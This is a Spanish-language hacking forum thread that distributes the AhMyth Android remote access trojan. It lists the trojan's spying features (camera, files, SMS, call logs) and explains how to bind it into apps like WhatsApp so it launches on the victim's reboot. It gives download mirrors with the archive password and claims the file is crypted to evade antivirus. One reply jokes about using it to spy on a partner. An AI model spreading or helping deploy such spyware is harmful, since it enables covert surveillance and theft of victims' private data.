WINTXCODERS

Seguridad informática => Malwares => Mensaje iniciado por: WIитX en Marzo 20, 2017, 07:56:27 PM

Título: AhMyth Android RAT 2017
Publicado por: WIитX en Marzo 20, 2017, 07:56:27 PM
Caracteristicas:
Versión de prueba no tienen un montón de ventajas, afirmó en Oahth (Github) pronto para los desarrolladores para desarrollar y aumentar los beneficios.
1.sour de una cámara
2. Examinar archivos
3. Ejecutar las trackballs
4. Mostrar Allokishn
5. Traer nombres
6. recuperar mensajes y enviar un mensaje
7. llevar registro de comunicaciones
8. integrar el archivo apk con cualquier otro archivo de dos maneras:

La primera forma: inspirada por las vías existentes en Internet que se incorpora a (actividad de Lanzador), pero no funcionan en la mayoría de los programas porque modulan archivos de código de los archivos de la codificación (archivos java) aquí y estropean la mayoría de los programas una vez que el código de Valsors de la enmienda.

La segunda forma: a partir de un troyano innovador y está integrando sin perjuicio de (archivos java), sino la enmienda en el archivo (AndroidManifest) para que el troyano se ejecuta sólo cuando el primer reinicio de una víctima (OnBoot) Este método funciona en la mayoría de los programas Tales como (Whatsapp, Instagram), y otros.
...

(https://i.imgur.com/t5zRmzd.png)

DESCARGAR (https://www.sendspace.com/file/k7sjrp)
Título: Re:AhMyth Android RAT 2017
Publicado por: Neva(); en Abril 02, 2017, 08:53:43 AM
Por favor,agrega un link de virustotal.
Adjunto las normas de la sección: https://forum.wintxcoders.com/index.php?topic=1490.0
Título: Re:AhMyth Android RAT 2017
Publicado por: PAYASAKX en Abril 02, 2017, 10:33:05 AM
You are not allowed to view links. Register or Login
Por favor,agrega un link de virustotal.
Adjunto las normas de la sección: https://forum.wintxcoders.com/index.php?topic=1490.0
No es muy inteligente por tu parte mandar a analizar un archivo de malware que obviamente te lo va a detectar, lo analices o no, sabemos la respuesta, va a salir que el archivo es "virus". ¿Esperas que no te detecte este tipo de programas? Por algo se desactiva el firewall y la seguridad del equipo para ejecutarlo en muchos casos.

De todas formas aquí esta;  0 detecciones crypteado xd
https://virustotal.com/es/url/301b82100c6c61667f60bb9e4200ae2d24ffb34480c12f7369618a9f28594295/analysis/1491121826/
Título: Re:AhMyth Android RAT 2017
Publicado por: Neva(); en Abril 02, 2017, 03:57:53 PM
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
Por favor,agrega un link de virustotal.
Adjunto las normas de la sección: https://forum.wintxcoders.com/index.php?topic=1490.0
No es muy inteligente por tu parte mandar a analizar un archivo de malware que obviamente te lo va a detectar, lo analices o no, sabemos la respuesta, va a salir que el archivo es "virus". ¿Esperas que no te detecte este tipo de programas? Por algo se desactiva el firewall y la seguridad del equipo para ejecutarlo en muchos casos.

De todas formas aquí esta;  0 detecciones crypteado xd
https://virustotal.com/es/url/301b82100c6c61667f60bb9e4200ae2d24ffb34480c12f7369618a9f28594295/analysis/1491121826/
Has analizado una URL se una página famosa, no te va a detectar nada.
Aún si analizases el archivo rar tampoco te lo detectaría el anti virus.
Los malware sólo son detectados si son famosos y si lo son, lo son por su nombre, dependiendo del tipo de amenaza detectada se puede suponer una cosa u otra,  se puede ver si lo detectado es el icono, la fiabilidad del archivo o si tiene patrones de cierto malware.
El builder de un virus nunca debería de ser detectado como el stub, si el builder es detectado como stub de otro virus entonces está infectado.

Si he puesto esas normas es por que llevo a;os trabajando en cosas de éste tipo y sé por qué lo hago.
Título: Re:AhMyth Android RAT 2017
Publicado por: juanKrol en Mayo 06, 2017, 08:28:11 PM
El link de descarga no funciona que hago?
Título: Re:AhMyth Android RAT 2017
Publicado por: WIитX en Mayo 06, 2017, 09:05:14 PM
You are not allowed to view links. Register or Login
El link de descarga no funciona que hago?

Windows32
http://www71.zippyshare.com/v/CEiPunk2/file.html
Windows64
http://www40.zippyshare.com/v/fUqUE4B9/file.html
Linux32
http://www106.zippyshare.com/v/CCj3DoZA/file.html
Linux64
http://www119.zippyshare.com/v/Ia7DgZgU/file.html

Si te pide alguna contraseña: Android
Título: Re:AhMyth Android RAT 2017
Publicado por: @η∂яєѕмσяєησ en Mayo 22, 2017, 12:22:54 AM
Me parece un buen trabajo y una buena herramienta para investigar a tu novia...(vale no jaja), mañana la probaré a ver que tal!